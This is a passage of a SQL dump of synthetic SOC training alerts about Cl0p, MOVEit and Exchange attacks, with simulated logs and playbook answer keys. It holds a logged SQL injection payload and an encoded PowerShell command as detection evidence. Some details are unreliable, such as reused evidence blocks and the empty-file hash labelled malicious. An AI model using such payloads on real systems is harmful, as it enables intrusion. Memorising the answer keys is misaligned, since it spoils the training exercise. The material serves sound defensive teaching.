2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"DLP-20231015142345-001\\\",\\\"source_ip\\\":\\\"10.0.0.5\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"financial_report_q3_2023.xlsx\\\",\\\"hash\\\":\\\"3a7bd3e2360a7bb9d8d1d1f2e6a8e4d2\\\",\\\"data_volume\\\":\\\"2GB\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action_taken\\\":\\\"Alerted\\\",\\\"description\\\":\\\"Detected large data transfer to external IP not whitelisted.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.226Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"DLP-20231015142345-001\\\",\\\"source_ip\\\":\\\"10.0.0.5\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"financial_report_q3_2023.xlsx\\\",\\\"hash\\\":\\\"3a7bd3e2360a7bb9d8d1d1f2e6a8e4d2\\\",\\\"data_volume\\\":\\\"2GB\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action_taken\\\":\\\"Alerted\\\",\\\"description\\\":\\\"Detected large data transfer to external IP not whitelisted.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.226Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"DLP-20231015142345-001\\\",\\\"source_ip\\\":\\\"10.0.0.5\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"financial_report_q3_2023.xlsx\\\",\\\"hash\\\":\\\"3a7bd3e2360a7bb9d8d1d1f2e6a8e4d2\\\",\\\"data_volume\\\":\\\"2GB\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action_taken\\\":\\\"Alerted\\\",\\\"description\\\":\\\"Detected large data transfer to external IP not whitelisted.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(591, 'Initial Access via SQL Injection', 'high', 'Web application firewall logs', 'Cl0p identifies and exploits an SQL injection vulnerability in the MOVEit platform, allowing unauthorized access to sensitive databases.', 'Exploitation of Vulnerability', 'T1190', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:45Z\",\"event_id\":\"WAF123456789\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"destination_port\":443,\"method\":\"GET\",\"url\":\"https://moveit.example.com/login\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\",\"request_payload\":\"username=admin\' OR 1=1-- &password=dummy\",\"response_code\":200,\"signature_id\":\"SQLi-2023-001\",\"description\":\"SQL Injection attempt detected\"}', '2026-01-08 22:12:37', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous SQL injection attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Inventory\",\"verdict\":\"internal\",\"details\":\"Internal MOVEit server.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"https://moveit.example.com/login\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Web Application\",\"verdict\":\"clean\",\"details\":\"Legitimate web application URL.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(592, 'Automated Execution of Data Harvesting Scripts', 'high', 'Endpoint detection and response (EDR) tools', 'Following initial access, Cl0p group deployed automated JavaScript scripts on the compromised MOVEit infrastructure to systematically extract large volumes of sensitive data.', 'T1059.007: Command and Scripting Interpreter: JavaScript', 'T1059.007', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"host_ip\":\"192.168.1.45\",\"host_name\":\"compromised-host\",\"detected_script\":\"/var/tmp/data_harvest.js\",\"hash\":\"ec2f4a6b3e8fbc4a9d1f2c3d4e5f6a7b8c9d0e1f\",\"attacker_ip\":\"203.0.113.66\",\"user\":\"john_doe\",\"process_id\":4567,\"command_line\":\"node /var/tmp/data_harvest.js\",\"execution_time\":\"2023-10-05T14:23:30Z\"}', '2026-01-08 22:12:37', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal network IP\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"ec2f4a6b3e8fbc4a9d1f2c3d4e5f6a7b8c9d0e1f\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known hash associated with Cl0p activities\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.66\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activities\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"john_doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"User account used in suspicious script execution\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"/var/tmp/data_harvest.js\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"malicious\",\"details\":\"Detected as part of data exfiltration operation\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'EDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(593, 'Establishing Persistence within Networks', 'high', 'System startup and logon logs', 'Cl0p group has established persistence by modifying the system logon scripts to execute malicious binaries during system startup. This action ensures continued access for prolonged data theft.', 'T1547: Boot or Logon Autostart Execution', 'T1547', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T03:45:23Z\",\"event_id\":\"4624\",\"computer_name\":\"compromised-host\",\"logon_type\":\"2\",\"source_ip\":\"203.0.113.45\",\"username\":\"admin_user\",\"logon_process\":\"User32\",\"file_path\":\"C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\malware.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"description\":\"User logon with modified startup script executing malware.\"}', '2026-01-08 22:12:37', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelligenceDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with Cl0p group activity.\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\malware.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File recognized as a Cl0p group persistence mechanism.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareBazaar\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Cl0p malware sample.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"User account compromised by adversary.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.229Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:45:23Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"computer_name\\\":\\\"compromised-host\\\",\\\"logon_type\\\":\\\"2\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"admin_user\\\",\\\"logon_process\\\":\\\"User32\\\",\\\"file_path\\\":\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Start Menu\\\\\\\\Programs\\\\\\\\Startup\\\\\\\\malware.exe\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"description\\\":\\\"User logon with modified startup script executing malware.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.229Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:45:23Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"computer_name\\\":\\\"compromised-host\\\",\\\"logon_type\\\":\\\"2\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"admin_user\\\",\\\"logon_process\\\":\\\"User32\\\",\\\"file_path\\\":\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Start Menu\\\\\\\\Programs\\\\\\\\Startup\\\\\\\\malware.exe\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"description\\\":\\\"User logon with modified startup script executing malware.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.229Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:45:23Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"computer_name\\\":\\\"compromised-host\\\",\\\"logon_type\\\":\\\"2\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"admin_user\\\",\\\"logon_process\\\":\\\"User32\\\",\\\"file_path\\\":\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Start Menu\\\\\\\\Programs\\\\\\\\Startup\\\\\\\\malware.exe\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"description\\\":\\\"User logon with modified startup script executing malware.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.229Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:45:23Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"computer_name\\\":\\\"compromised-host\\\",\\\"logon_type\\\":\\\"2\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"admin_user\\\",\\\"logon_process\\\":\\\"User32\\\",\\\"file_path\\\":\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Start Menu\\\\\\\\Programs\\\\\\\\Startup\\\\\\\\malware.exe\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"description\\\":\\\"User logon with modified startup script executing malware.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.229Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:45:23Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"computer_name\\\":\\\"compromised-host\\\",\\\"logon_type\\\":\\\"2\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"admin_user\\\",\\\"logon_process\\\":\\\"User32\\\",\\\"file_path\\\":\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Start Menu\\\\\\\\Programs\\\\\\\\Startup\\\\\\\\malware.exe\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"description\\\":\\\"User logon with modified startup script executing malware.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(594, 'Lateral Movement to Enhance Data Access', 'high', 'Network traffic analysis', 'Suspicious lateral movement detected within the organization network indicating potential attempt to enhance data access by hiding indicators on host systems.', 'T1070: Indicator Removal on Host', 'T1070', 1, 'new', NULL, '{\"timestamp\":\"2023-10-25T14:22:18Z\",\"event_id\":\"4634\",\"source_ip\":\"203.0.113.56\",\"destination_ip\":\"192.168.1.45\",\"destination_host\":\"file-server-02\",\"malware_hash\":\"3f4d5c6e7b8e9f0a123456789abcdef0\",\"user\":\"admin_user\",\"filename\":\"cl0p_removal_tool.exe\",\"action\":\"Indicator removal\",\"log_message\":\"Possible use of Cl0p malware detected. Unusual indicator removal activity from 203.0.113.56 targeting 192.168.1.45 by user admin_user using cl0p_removal_tool.exe.\"}', '2026-01-08 22:12:37', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.56\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with Cl0p APT group.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset\",\"verdict\":\"internal\",\"details\":\"Internal file server targeted by the threat.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3f4d5c6e7b8e9f0a123456789abcdef0\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Cl0p malware variant.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"cl0p_removal_tool.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"Filename associated with Cl0p malware activities.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"internal\",\"details\":\"User account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(595, 'Mass Exfiltration and Unique Extortion', 'high', 'Outbound network traffic logs', 'In the final act, Cl0p exfiltrates data to external servers and initiates a unique extortion campaign, threatening public release rather than deploying ransomware. The operation involved transferring large volumes of data to a known malicious IP associated with Cl0p\'s command and control infrastructure.', 'T1041: Exfiltration Over C2 Channel', 'Exfiltration Over C2 Channel', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:32:17Z\",\"src_ip\":\"192.168.1.45\",\"dst_ip\":\"185.225.19.78\",\"dst_port\":443,\"protocol\":\"HTTPS\",\"bytes_out\":987654321,\"username\":\"jdoe\",\"filename\":\"financial_data_backup.zip\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"action\":\"ALLOW\"}', '2026-01-08 22:12:37', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.225.19.78\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP associated with known Cl0p C2 infrastructure.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with potential data exfiltration.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"financial_data_backup.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"File matches internal naming conventions for sensitive data backups.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(596, 'Suspicious Access to Exchange Server', 'high', 'Exchange Server logs', 'Initial access attempt detected on the Exchange server via CVE-2021-34473 exploitation. An unauthorized request was made from a suspicious external IP address, potentially setting the stage for further attacks.', 'Initial Access', 'T1190', 1, 'new', NULL, '{\"timestamp\":\"2023-10-22T14:03:45Z\",\"event_id\":\"4625\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.10.5\",\"destination_port\":\"443\",\"username\":\"unauthorized_user\",\"action\":\"login_attempt\",\"status\":\"failed\",\"exploit\":\"CVE-2021-34473\",\"file_accessed\":\"/owa/auth.owa\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0\"}', '2026-01-08 22:15:20', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Associated with known APT groups targeting Exchange servers.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.10.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal Exchange server IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"unauthorized_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Exchange Server\",\"verdict\":\"suspicious\",\"details\":\"Username not recognized in the directory.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"/owa/auth.owa\",\"is_critical\":true,\"osint_result\":{\"source\":\"Security Logs\",\"verdict\":\"suspicious\",\"details\":\"File frequently targeted in Exchange exploits.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.232Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-22T14:03:45Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.10.5\\\",\\\"destination_port\\\":\\\"443\\\",\\\"username\\\":\\\"unauthorized_user\\\",\\\"action\\\":\\\"login_attempt\\\",\\\"status\\\":\\\"failed\\\",\\\"exploit\\\":\\\"CVE-2021-34473\\\",\\\"file_accessed\\\":\\\"/owa/auth.owa\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.232Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-22T14:03:45Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.10.5\\\",\\\"destination_port\\\":\\\"443\\\",\\\"username\\\":\\\"unauthorized_user\\\",\\\"action\\\":\\\"login_attempt\\\",\\\"status\\\":\\\"failed\\\",\\\"exploit\\\":\\\"CVE-2021-34473\\\",\\\"file_accessed\\\":\\\"/owa/auth.owa\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.232Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-22T14:03:45Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.10.5\\\",\\\"destination_port\\\":\\\"443\\\",\\\"username\\\":\\\"unauthorized_user\\\",\\\"action\\\":\\\"login_attempt\\\",\\\"status\\\":\\\"failed\\\",\\\"exploit\\\":\\\"CVE-2021-34473\\\",\\\"file_accessed\\\":\\\"/owa/auth.owa\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.232Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-22T14:03:45Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.10.5\\\",\\\"destination_port\\\":\\\"443\\\",\\\"username\\\":\\\"unauthorized_user\\\",\\\"action\\\":\\\"login_attempt\\\",\\\"status\\\":\\\"failed\\\",\\\"exploit\\\":\\\"CVE-2021-34473\\\",\\\"file_accessed\\\":\\\"/owa/auth.owa\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.232Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-22T14:03:45Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.10.5\\\",\\\"destination_port\\\":\\\"443\\\",\\\"username\\\":\\\"unauthorized_user\\\",\\\"action\\\":\\\"login_attempt\\\",\\\"status\\\":\\\"failed\\\",\\\"exploit\\\":\\\"CVE-2021-34473\\\",\\\"file_accessed\\\":\\\"/owa/auth.owa\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(597, 'Web Shell Deployment Detected', 'high', 'Web server logs', 'A web shell has been deployed on the server, allowing remote execution of commands by attackers. This indicates a severe security breach that needs immediate attention.', 'Execution', 'T1505.003', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:34Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"method\":\"POST\",\"url\":\"/uploads/webshell.php\",\"http_status\":200,\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"uploaded_file\":{\"filename\":\"webshell.php\",\"md5_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"username\":\"admin_user\",\"session_id\":\"abcd1234efgh5678ijkl\"}', '2026-01-08 22:15:20', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with APT attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal web server\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"webshell.php\",\"is_critical\":true,\"osint_result\":{\"source\":\"Incident Response Team\",\"verdict\":\"malicious\",\"details\":\"File identified as web shell\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"MD5 hash associated with known web shells\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"suspicious\",\"details\":\"Admin account used for unauthorized access\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 